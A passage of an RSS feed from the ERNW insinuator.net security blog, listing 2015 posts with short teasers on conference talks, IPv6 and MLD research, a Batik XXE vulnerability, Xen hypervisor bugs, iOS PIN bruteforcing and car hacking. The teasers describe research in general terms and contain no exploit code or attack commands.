      <description>&lt;p&gt;Hey!&lt;/p&gt;&#xA;&lt;p&gt;I attended this &lt;a href=&#34;http://hek.si/&#34;&gt;really nice conference in Slovenia&lt;/a&gt; on April 16th. It was a smaller conference, but very memorable for the people (students, IT sec professionals and managers alike) who attended.&lt;br&gt;&#xA;I also had the pleasure to present on &lt;a href=&#34;https://www.ernw.de/download/ERNW_heksi_how_secure_am_i_with_emet_v1.0.pdf&#34;&gt;How secure am I with EMET?&lt;/a&gt; and &lt;a href=&#34;https://www.ernw.de/download/ERNW_heksi_apt_armor_eval_v1.0.pdf&#34;&gt;Evaluating the APT armor&lt;/a&gt; and wanted to share the slides with you — feel free to approach me for any kind of feedback or discussion.&lt;/p&gt;&#xA;&lt;p&gt;I’m looking forward to go to Ljubljana again! 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>OS IPv6 Behavior in Conflicting Environments</title>
      <link>https://insinuator.net/2015/04/os-ipv6-behavior-in-conflicting-environments/</link>
      <pubDate>Thu, 30 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/04/os-ipv6-behavior-in-conflicting-environments/</guid>
      <description>&lt;p&gt;I was invited by the &lt;a href=&#34;http://www.swissipv6council.ch/&#34;&gt;Swiss IPv6 Council&lt;/a&gt; to give a talk on this topic yesterday. We had good conversations after the talk – thanks for the invitation!&lt;/p&gt;&#xA;&lt;p&gt;For those interested the slides &lt;a href=&#34;https://www.ernw.de/download/ERNW_IPv6_Behavior_Conflicting_Environments_20150430.pdf&#34;&gt;can be found here&lt;/a&gt;. I will happily discuss the intricacies of DHCPv6 and how to deploy it in complex environments at the upcoming &lt;a href=&#34;http://www.ipv6conference.ch/&#34;&gt;IPv6 Business Conference&lt;/a&gt; in Zurich and in my “&lt;a href=&#34;http://www.hmtrainingsolutions.com/de/seminare/1-seminar/88-ipv6-in-enterprise-networks141205170702.html&#34;&gt;IPv6 in Enterprise Networks&lt;/a&gt;” training in Berlin.&lt;/p&gt;&#xA;&lt;p&gt;Have a great day everybody&lt;/p&gt;</description>
    </item>
    <item>
      <title>SSL Tidbits at the BASTA.NET</title>
      <link>https://insinuator.net/2015/04/ssl-tidbits-at-the-basta.net/</link>
      <pubDate>Wed, 29 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/04/ssl-tidbits-at-the-basta.net/</guid>
      <description>&lt;p&gt;A while a go Dominik and I gave an introductory presentation about SSL at the BASTA.NET conference, a developer-oriented event held in Darmstadt twice a year. At that time there were quite some enthusiastic participants but recently we’ve also gotten some inquiries asking for the relevant materials. Although there’s no recording of the session, we’ve decided to put the slides here for those interested who didn’t make it to the talk.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Car Hacking Lab – Work in Progress</title>
      <link>https://insinuator.net/2015/04/car-hacking-lab-work-in-progress/</link>
      <pubDate>Tue, 28 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/04/car-hacking-lab-work-in-progress/</guid>
      <description>&lt;p&gt;We just wanted to share some impressions from our car hacking lab:&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.insinuator.net/wp-content/uploads/2015/04/car_lab2.mp4&#34;&gt;https://www.insinuator.net/wp-content/uploads/2015/04/car_lab2.mp4&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;stay tuned,&lt;/p&gt;&#xA;&lt;p&gt;The ERNW Car Hacking Team&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers PacketWars 2015 – Write Up</title>
      <link>https://insinuator.net/2015/04/troopers-packetwars-2015-write-up/</link>
      <pubDate>Tue, 21 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/04/troopers-packetwars-2015-write-up/</guid>
      <description>&lt;h1 id=&#34;hello-hackers&#34;&gt;Hello Hackers!&lt;/h1&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;This year’s &lt;a href=&#34;http://www.packetwars.com&#34;&gt;PacketWars&lt;/a&gt; contest at Troopers was a blast! Under the topic of “Connected Car” the teams faced several different challenges, which we will describe (as a debriefing) here.&lt;/p&gt;&#xA;&lt;h1 id=&#34;story&#34;&gt;Story&lt;/h1&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;From the &lt;a href=&#34;https://twitter.com/bryanfite&#34;&gt;Packetmaster’s&lt;/a&gt; Battle Briefing:&lt;/p&gt;&#xA;&lt;p&gt;You and your krew are “freelancers” hired to identify and neutralize an unknown threat agent who has created weaponized software and delivered it to civilian Connected Cars via compromised EV (Electrical Vehicle) charing stations. To make matters worse there are indications that new strains of the malware are appearing as the “worm” spreads from car to car. The mobile mesh network created by the Connect Car is highly resilient, allowing the malware to spread exponentially. Time is of the essence.&lt;br&gt;&#xA;Malware analysis suggests that besides a botnet module, there is an active CANBus injection capability. There appears to be other modules but they haven’t been properly reversed and analyzed yet.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Analysis of an Alarm System – Part 1/3</title>
      <link>https://insinuator.net/2015/04/analysis-of-an-alarm-system-part-1/3/</link>
      <pubDate>Mon, 20 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/04/analysis-of-an-alarm-system-part-1/3/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;br&gt;&#xA;This and the following two posts should serve as a step-by-step guide through the whole process of analyzing a radio frequency black box, demodulate and understand the data transfered and finally modulate our own data in order to e.g. perform a brute force attacks.&lt;/p&gt;&#xA;&lt;p&gt;The information provided and the results are immensely inspired by Michael Ossmann and the workshops he has given at our location. Visit him and his great tool HackRF at &lt;a href=&#34;https://greatscottgadgets.com/hackrf/&#34;&gt;https://greatscottgadgets.com/hackrf/&lt;/a&gt; !&lt;/p&gt;</description>
    </item>
    <item>
      <title>General Pr0ken Filesystem – Hacking IBM’s GPFS</title>
      <link>https://insinuator.net/2015/04/general-pr0ken-filesystem-hacking-ibms-gpfs/</link>
      <pubDate>Sun, 12 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/04/general-pr0ken-filesystem-hacking-ibms-gpfs/</guid>
      <description>&lt;p&gt;&lt;em&gt;This post is a short wrap-up of our Troopers talk about the research we did on IBM’s General Parallel File System. If you are interested in all the technical details take a look at our &lt;a href=&#34;https://www.troopers.de/media/filer_public/69/81/69812750-49b0-4631-a3e6-fb402c88adf3/fwfggpfs_troopers15.pdf&#34; title=&#34;slides&#34;&gt;slides&lt;/a&gt; or the &lt;a href=&#34;https://www.youtube.com/watch?v=rmWMEdA-3Qs&#34;&gt;video recording&lt;/a&gt;. We will also give an updated version of this talk at the &lt;a href=&#34;http://www.phdays.com/&#34;&gt;PHDays&lt;/a&gt; conference in Moscow next month.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;The IBM General Parallel File System is a distributed file system used in large scale enterprise environments, high performance clusters as well as some of the worlds largest super computers. It is considered by many in the industry to be the most feature rich and production hardened distributed file system currently available. GPFS has a long and really interesting history, going back to the Tiger Shark file system created by IBM 1993.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Apple iOS PIN Bruteforce</title>
      <link>https://insinuator.net/2015/04/apple-ios-pin-bruteforce/</link>
      <pubDate>Tue, 07 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/04/apple-ios-pin-bruteforce/</guid>
      <description>&lt;p&gt;Over the past few weeks, multiple news sites have covered some mystical approach to bruteforce PINs on Apple iOS devices. All articles cover a black box called IP Box, the fact that PINs can be broken and that sometimes the automatic wipe after 10 failed tries can be circumvented. Sadly, as often, the what is described but not the how……&lt;/p&gt;&#xA;&lt;h2&gt;&lt;/h2&gt;&#xA;&lt;p&gt;This blog post will give you a simple overview of both the practical attacks and the vulnerabilities behind them. Although the Headings don’t quite give away the content, the post starts with a simple PIN bruteforce against iOS 7.x and then goes over to a more advanced attack on iOS 8.x and a few technical details on the “black box”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SI6 Networks’ IPv6 Toolkit v2.0 (Guille) released at the Troopers IPv6 Security Summit</title>
      <link>https://insinuator.net/2015/04/si6-networks-ipv6-toolkit-v2.0-guille-released-at-the-troopers-ipv6-security-summit/</link>
      <pubDate>Sun, 05 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/04/si6-networks-ipv6-toolkit-v2.0-guille-released-at-the-troopers-ipv6-security-summit/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;https://twitter.com/FernandoGont&#34;&gt;Fernando Gont&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;On March 16^(th), 2015, at the Troopers &lt;a href=&#34;https://www.troopers.de/events/troopers15/322_ipv6_security_summit/&#34;&gt;IPv6 Security Summit&lt;/a&gt;, we finally released the SI6 Networks’ IPv6 Toolkit v2.0 (Guille). The aforementioned release is now available at the &lt;a href=&#34;http://www.si6networks.com/tools/ipv6toolkit&#34;&gt;SI6 IPv6 Toolkit homepage&lt;/a&gt;. It is the result of over a year of work, and includes improvements in the following areas:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Increased portability&lt;/li&gt;&#xA;&lt;li&gt;Bug fixes&lt;/li&gt;&#xA;&lt;li&gt;Additional features in existing tools&lt;/li&gt;&#xA;&lt;li&gt;Brand-new tools&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Increased Portability&lt;/p&gt;&#xA;&lt;p&gt;One of the goals that the SI6 Toolkit had since its inception is that of portability. The SI6 Toolkit has supported all major BSD-derived OSes, Linux, and Mac OS for a number of years now. And this new release supports yet another new platform: OpenSolaris. We believe that besides supporting a greater user base, increased portability ultimately results in improved code quality.&lt;/p&gt;</description>
    </item>
    <item>
      <title>MLD, a tale on Complexity in IPv6</title>
      <link>https://insinuator.net/2015/04/mld-a-tale-on-complexity-in-ipv6/</link>
      <pubDate>Sat, 04 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/04/mld-a-tale-on-complexity-in-ipv6/</guid>
      <description>&lt;p&gt;The purpose of this blog post is to elucidate how and why MLD, an IPv6 protocol we’ve been lately talking quite a bit about, is an unnecessarily complex beast  . This article should also serve to summarize a couple of points we’ve mentioned during our talks about MLD but which because of time constraints never make it into the main discussion. We’ve talked about &lt;a href=&#34;http://www.insinuator.net/tag/mld/&#34; title=&#34;Other Aspects of MLD&#34;&gt;other aspects of MLD in previous posts&lt;/a&gt;. So, have a look at those if this is a topic which you find interesting. Without further ado, let’s start for today.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Syscan 2015</title>
      <link>https://insinuator.net/2015/03/syscan-2015/</link>
      <pubDate>Tue, 31 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/syscan-2015/</guid>
      <description>&lt;p&gt;Last week Matthias and I went to Singapore to teach our workshop on &lt;a href=&#34;https://www.troopers.de/events/troopers15/293_exploiting_hypervisors/&#34;&gt;Hypervisor Exploitation&lt;/a&gt; at &lt;a href=&#34;https://syscan.org/&#34;&gt;SyScan&lt;/a&gt;. After a very unpleasant Lufthansa strike (which made us arrive late in Singapore) and two intense workshop days, we were free to attend the “last” SyScan. There are few IT security conferences that have such a great reputation in the community and so we had high expectations, which were definitely not disappointed. This year had a lot of really interesting talks so I will just summarize some of the ones I liked the most.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 15 Badge</title>
      <link>https://insinuator.net/2015/03/troopers-15-badge/</link>
      <pubDate>Tue, 31 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/troopers-15-badge/</guid>
      <description>&lt;p&gt;As TROOPERS15 has come to an end, I’ve finally got the time and energy to give you a deeper insight into the TR15 badge. As most of you have probably heard during the conference, this year’s badge was based on the &lt;a href=&#34;http://www.openpcd.org/OpenPCD_2_RFID_Reader_for_13.56MHz&#34;&gt;OpenPCD2&lt;/a&gt;. The OpenPCD 2 is a 13.56MHz NFC Reader, Writer and Emulator under the GNU GPL v2. As NFC is, yet again, on an uprise, a badge with NFC simply gives you the chance to fiddle around and hack stacks of stuff in the real world. Adding some TROOPERS spirit and a few little secrets we hope we’ve designed a pretty nice badge!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers15 Videos Online</title>
      <link>https://insinuator.net/2015/03/troopers15-videos-online/</link>
      <pubDate>Sat, 28 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/troopers15-videos-online/</guid>
      <description>&lt;p&gt;We’ve just published the videos from TROOPERS15. The playlist can be found &lt;a href=&#34;https://www.youtube.com/playlist?list=PL1eoQr97VfJkfckz9nZFR7tZoBkjij23f&#34;&gt;here&lt;/a&gt;.&lt;br&gt;&#xA;Thanks! again to everybody for joining us in Heidelberg. We had a great time with you 😉&lt;/p&gt;&#xA;&lt;p&gt;Have a good weekend,&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250]</title>
      <link>https://insinuator.net/2015/03/xml-external-entity-xxe-injection-in-apache-batik-library-cve-2015-0250/</link>
      <pubDate>Sat, 21 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/xml-external-entity-xxe-injection-in-apache-batik-library-cve-2015-0250/</guid>
      <description>&lt;p&gt;During one of our latest web application code review projects I came across a vulnerability for which I think it is worth to speak about. It is an injection based attack against XML parsers which uses a rarely required feature called external entity expansion. The XML specification allows XML documents to define entities which reference resources external to the document and parsers typically support this feature by default. If an application parses XML input from untrusted sources and the parsing routine is not properly configured this can be exploited by an attacker with a so called XML external entity (XXE) injection. A successful XXE injection attack could allow an attacker to access the file system, cause a DoS attack or inject script code (e.g. Javascript to perform an XSS attack).&lt;/p&gt;</description>
    </item>
    <item>
      <title>GSM@Troopers</title>
      <link>https://insinuator.net/2015/03/gsm@troopers/</link>
      <pubDate>Wed, 18 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/gsm@troopers/</guid>
      <description>&lt;p&gt;Additionally to Wifi, Troopers is also offering a GSM network.&lt;br&gt;&#xA;If you want to use it, simply ask your phone to scan for available mobile networks. There you should see the usual T-Mobile D, Vodafone.de, E-Plus, O2-de operators, but also the unusual D 23 or 262 23. Just select this one, and your are done. You also can use the Troopers SIMs which you get on the welcome desk on the ground floor.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Final Agenda of Troopers15 TelcoSecDay</title>
      <link>https://insinuator.net/2015/03/final-agenda-of-troopers15-telcosecday/</link>
      <pubDate>Tue, 10 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/final-agenda-of-troopers15-telcosecday/</guid>
      <description>&lt;p&gt;Admitted, we’re a bit late this time, but here we go with the agenda of this year’s TelcoSecDay.&lt;/p&gt;&#xA;&lt;p&gt;Given the high number of quality contributions overall there’s more talks than in the previous years and we’ll hence start more early (and finish later 🙂 ), so please plan accordingly.&lt;br&gt;&#xA;This is the agenda, details for the invididual talks can be found in the respective links:&lt;/p&gt;&#xA;&lt;p&gt;8:30-9:00 Opening &amp;amp; Intro&lt;br&gt;&#xA;9:00-9:45 &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-15-telcosecday-first-talks/&#34;&gt;Luca Bruno: Through the Looking-Glass, and What Eve Found There&lt;/a&gt;&lt;br&gt;&#xA;9:45-10:30 &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-telcosecday-next-talks/&#34;&gt;Dieter Spaar: How to Assess M2M Communication from an Attacker’s Perspective&lt;/a&gt;&lt;br&gt;&#xA;Break&lt;br&gt;&#xA;11:00-11:45 &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-15-telcosecday-first-talks/&#34;&gt;Tobias Engel: Securing the SS7 Interconnect&lt;/a&gt;&lt;br&gt;&#xA;11:45-12:30 &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-telcosecday-next-talks/&#34;&gt;Ravishankar Borgaonkar: TelcoSecurity Mirage: 1G to 5G&lt;/a&gt;&lt;br&gt;&#xA;12:30-13:00 &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-telcosecday-next-talks-ii/&#34;&gt;Hendrik Schmidt: Security Aspects of VoLTE&lt;/a&gt;&lt;br&gt;&#xA;Lunch&lt;br&gt;&#xA;14:00-14:45 &lt;a href=&#34;http://www.insinuator.net/2015/02/another-talk-added-to-troopers15-telcosecday/&#34;&gt;Rob Kuiters: On her majesty’s secret service – GRX and a Spy Agency&lt;/a&gt;&lt;br&gt;&#xA;14:45-15:30 &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-telcosecday-next-talks-ii/&#34;&gt;“Watching the Watchers”&lt;/a&gt;&lt;br&gt;&#xA;Break&lt;br&gt;&#xA;16:00-16:45 &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-15-telcosecday-first-talks/&#34;&gt;Markus Vervier: Borrowing Mobile Network Identities – Just Because We Can&lt;/a&gt;&lt;br&gt;&#xA;16:45-17:15 &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-telcosecday-next-talks-ii/&#34;&gt;Shahar Tal: I hunt TR-069 admins – CWMP Insecurity&lt;/a&gt;&lt;br&gt;&#xA;Refreshment&lt;br&gt;&#xA;17:30-18:00 Sébastien Roche (Orange): tba&lt;/p&gt;</description>
    </item>
    <item>
      <title>Revisiting Xen’s x86 Emulation: Xen XSA 123</title>
      <link>https://insinuator.net/2015/03/revisiting-xens-x86-emulation-xen-xsa-123/</link>
      <pubDate>Tue, 10 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/revisiting-xens-x86-emulation-xen-xsa-123/</guid>
      <description>&lt;p&gt;In my &lt;a href=&#34;http://www.insinuator.net/2015/02/the-dangers-of-x86-emulation-xen-xsa-110-and-105/&#34; title=&#34;The Dangers of x86 Emulation: Xen XSA 110 and 105&#34;&gt;last blog post&lt;/a&gt;, I gave an overview about recent vulnerabilities discovered in the x86 emulation layer of Xen. While both of the discussed vulnerabilities only allow for guest privilege escalation, the complexity of the involved code seemed to indicate that even more interesting bugs could be discovered. So I spent some time searching for memory corruption issues and discovered a very interesting bug that resulted in &lt;a href=&#34;http://xenbits.xen.org/xsa/advisory-123.html&#34;&gt;XSA 123&lt;/a&gt; . This post gives an overview about the root cause of the bug and a short description of exploitation challenges. A follow-up post will describe possible exploitation strategies in more detail.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Router Advertisement Flags, RDNSS and DHCPv6 Conflicting Configurations</title>
      <link>https://insinuator.net/2015/03/ipv6-router-advertisement-flags-rdnss-and-dhcpv6-conflicting-configurations/</link>
      <pubDate>Mon, 09 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/ipv6-router-advertisement-flags-rdnss-and-dhcpv6-conflicting-configurations/</guid>
      <description>&lt;p&gt;We’ve just released a whitepaper discussing the behavior of different operating systems once they receive IPv6 configuration parameters from different sources. For that purpose a number of lab tests were conducted.&lt;/p&gt;&#xA;&lt;p&gt;In short, it’s a mess. Again, &lt;a href=&#34;http://queue.acm.org/detail.cfm?id=1999945&#34;&gt;RFC ambiguity&lt;/a&gt; and/or (perceived) vendor implementation freedom suck big time. For us practitioners out (t)here this means (once more) we need extensive test labs and good troubleshooting guides for large scale IPv6 deployments.&lt;/p&gt;&#xA;&lt;p&gt;The detailed results can be found &lt;a href=&#34;https://www.ernw.de/download/ERNW_Whitepaper_IPv6_RAs_RDNSS_DHCPv6_Conflicting_Parameters.pdf&#34;&gt;in this paper&lt;/a&gt;. We hope to contribute to a better understanding of IPv6 specifics. I mean, &lt;a href=&#34;https://www.ernw.de/download/ERNW_IPv6_Today_Tomorrow.pdf&#34;&gt;after all it’s here already&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Practical IPv6 Troubleshooting while Setting up the Troopers Network</title>
      <link>https://insinuator.net/2015/03/practical-ipv6-troubleshooting-while-setting-up-the-troopers-network/</link>
      <pubDate>Mon, 09 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/practical-ipv6-troubleshooting-while-setting-up-the-troopers-network/</guid>
      <description>&lt;p&gt;Hello Everyone,&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.troopers.de/troopers/&#34;&gt;Troopers&lt;/a&gt; is right around the corner and as I am responsible for the whole conference network I wanted to make sure that everything is working as expected. I went to the venue on Friday because of two things I wanted/needed to setup. Compared to last year’s setup we had a couple of changes in regards to the provider connection (resulting in some changes for our network setup). First, we now have a rather big pipe for the uplink and more importantly (well that depends on the point of view ;)) there is a native IPv6 connection. Before that I had to tunnel all IPv6 traffic from the venue to one of our gateways and to forward it out (as native IPv6) from there. As this step isn’t necessary anymore, and the staff on the venue isn’t that experienced with IPv6, I had in mind to setup and verify that IPv6 is working as desired. The router used over there is a &lt;a href=&#34;http://routerboard.com/CCR1036-12G-4S&#34;&gt;Mikrotek Routerboard&lt;/a&gt;. As I haven’t worked with these devices before, I was curious whether everything works as it should ;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>An MLD Testing Methodology</title>
      <link>https://insinuator.net/2015/03/an-mld-testing-methodology/</link>
      <pubDate>Fri, 06 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/an-mld-testing-methodology/</guid>
      <description>&lt;p&gt;Based on recent research in the ERNW IPv6 lab and with &lt;a href=&#34;https://www.troopers.de/events/troopers15/467_mld_considered_harmful__breaking_another_ipv6_subprotocol/&#34;&gt;our MLD talk&lt;/a&gt; looming we’ve put together a (as we think) comprehensive document discussing how to thoroughly test MLD implementations in various components (network devices or servers/clients). We hope it can contribute to a better understanding of the protocol and that it can serve as either a checklist for your own environment or as a source of inspiration for researchers looking at MLD themselves.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Chiron Workshop at the IPv6 Security Summit of Troopers 15</title>
      <link>https://insinuator.net/2015/03/a-chiron-workshop-at-the-ipv6-security-summit-of-troopers-15/</link>
      <pubDate>Wed, 04 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/a-chiron-workshop-at-the-ipv6-security-summit-of-troopers-15/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/2014/02/a-short-teaser-on-my-new-ipv6-testing-framework/&#34;&gt;Last year&lt;/a&gt;, during the &lt;a href=&#34;https://www.troopers.de/events/troopers14/372_ipv6_security_summit/&#34;&gt;IPv6 Security Summit&lt;/a&gt; of &lt;a href=&#34;https://www.troopers.de/archives/troopers14/&#34;&gt;Troopers 14&lt;/a&gt; I had the pleasure to present publicly, for first time, my IPv6 Penetration Testing / Security Assessment framework called &lt;a href=&#34;http://www.secfu.net/tools-scripts/&#34;&gt;&lt;em&gt;Chiron&lt;/em&gt;&lt;/a&gt;&lt;em&gt;,&lt;/em&gt; while later, it was also presented at &lt;a href=&#34;http://2014.brucon.org/index.php/&#34;&gt;Brucon 14&lt;/a&gt; as part of the 5×5 project. This year, I am returning back to the place where it all started, to the beautiful city of Heidelberg to give another workshop about &lt;em&gt;Chiron&lt;/em&gt; at the &lt;a href=&#34;https://www.troopers.de/events/troopers15/322_ipv6_security_summit/&#34;&gt;IPv6 Security Summit&lt;/a&gt; of &lt;a href=&#34;https://www.troopers.de/troopers/&#34;&gt;Troopers 15&lt;/a&gt;. But, is it just another workshop with the known Chiron features or has something changed?&lt;br&gt;&#xA;I would say a lot :). The most significant enhancements are described below.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Bug Hunting for the Man on the Street</title>
      <link>https://insinuator.net/2015/03/bug-hunting-for-the-man-on-the-street/</link>
      <pubDate>Tue, 03 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/bug-hunting-for-the-man-on-the-street/</guid>
      <description>&lt;p&gt;This is a guest post from Vladimir Wolstencroft, to provide some details of his upcoming &lt;a href=&#34;https://www.troopers.de/events/troopers15/499_bug_hunting_for_the_man_on_the_street/&#34;&gt;#TR15 talk&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;What do you get when you combine a security appliance vendor, a bug bounty program, readily available virtualised machines, a lack of understanding of best security practices and broken crypto?&lt;br&gt;&#xA;Ownage, a good story and maybe even that bounty…&lt;/p&gt;&#xA;&lt;p&gt;Focusing on Barracuda’s numerous security appliances, this talk will detail bug hunting methods and the principles used to examine these machines:&lt;br&gt;&#xA;Starting with a black box test and the challenges that this approach poses, to decrypting the firmware, getting system root, bricking the box, fighting the (de)activation methods, getting system root again, DOS’ing the VM host and finally using Barracuda’s own source code to find those vulnerabilities that otherwise would be invisible or impossible to find! There were also some unexpected outcomes that followed…&lt;/p&gt;</description>
    </item>
    <item>
      <title>What to Do Today if You Want to Deploy IPv6 Tomorrow</title>
      <link>https://insinuator.net/2015/03/what-to-do-today-if-you-want-to-deploy-ipv6-tomorrow/</link>
      <pubDate>Tue, 03 Mar 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/03/what-to-do-today-if-you-want-to-deploy-ipv6-tomorrow/</guid>
      <description>&lt;p&gt;Today I gave a talk with said title in a private setting. Assuming the content might be of interest for some of you, we published the slides &lt;a href=&#34;https://www.ernw.de/download/ERNW_IPv6_Today_Tomorrow.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;As always we’re happy to receive comments or feedback.&lt;br&gt;&#xA;Cheers&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Dangers of x86 Emulation: Xen XSA 110 and 105</title>
      <link>https://insinuator.net/2015/02/the-dangers-of-x86-emulation-xen-xsa-110-and-105/</link>
      <pubDate>Mon, 23 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/the-dangers-of-x86-emulation-xen-xsa-110-and-105/</guid>
      <description>&lt;p&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/02/xen-300x81.png&#34; alt=&#34;Xen Logo&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;Developing a secure and feature rich hypervisor is no easy task. Recently, the open source Xen hypervisor was affected by two interesting vulnerabilities involving its x86 emulation code: &lt;a href=&#34;http://xenbits.xen.org/xsa/advisory-110.html&#34;&gt;XSA 110&lt;/a&gt; and &lt;a href=&#34;http://xenbits.xen.org/xsa/advisory-105.html&#34;&gt;XSA 105&lt;/a&gt;. Both bugs show that the attack surface of hypervisors is often larger than expected. XSA 105 was &lt;a href=&#34;//labs.bitdefender.com/wp-content/uploads/downloads/2014/10/Gaining-kernel-privileges-using-the-Xen-emulator.pdf&#34;&gt;originally reported&lt;/a&gt;) by Andrei Lutas from BitDefender. The patch adds missing privilege checks to the emulation routines of several critical system instructions including LGDT and LIDT. The vulnerable code can be reached from unprivileged user code running inside hardware virtual machine (HVM) guests and can be used to escalate guest privileges. XSA 110 was reported by Jan Beulich from SUSE and concerns insufficient checks when emulating long jumps, calls or returns.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Another Talk Added to Troopers15 TelcoSecDay</title>
      <link>https://insinuator.net/2015/02/another-talk-added-to-troopers15-telcosecday/</link>
      <pubDate>Sat, 14 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/another-talk-added-to-troopers15-telcosecday/</guid>
      <description>&lt;p&gt;We have pretty much finalized the agenda for the &lt;a href=&#34;https://www.troopers.de/troopers/&#34;&gt;Troopers&lt;/a&gt; TelcoSecDay and here’s another cool talk (the others can be found &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-15-telcosecday-first-talks/&#34;&gt;here&lt;/a&gt;, &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-telcosecday-next-talks/&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-telcosecday-next-talks-ii/&#34;&gt;here&lt;/a&gt;):&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Rob Kuiters: On her majesty’s secret service – GRX and a Spy Agency&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Synopsis: In 2013 the GPRS Roaming eXchange (GRX) was in mainstream media as part of the high profile Edward Snowden revelations. The leaked documents indicated that the UK government’s intelligence organisation, Government Communications Headquarters’ (GCHQ) hacked the Belgian GRX provider, Belgacom International Carrier Services (BICS). They did this by targeting the GRX provider’s employees with the ultimate aim of gaining access to Belgacom’s Core GRX routers. Allegedly, GCHQ hacked the GRX routers in order to carry out man-in-the middle “traffic sniffing” attacks against mobile users who are roaming with smartphones or other devices capable of handling data.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How to go ahead with future end of life Windows (2003) Servers</title>
      <link>https://insinuator.net/2015/02/how-to-go-ahead-with-future-end-of-life-windows-2003-servers/</link>
      <pubDate>Thu, 12 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/how-to-go-ahead-with-future-end-of-life-windows-2003-servers/</guid>
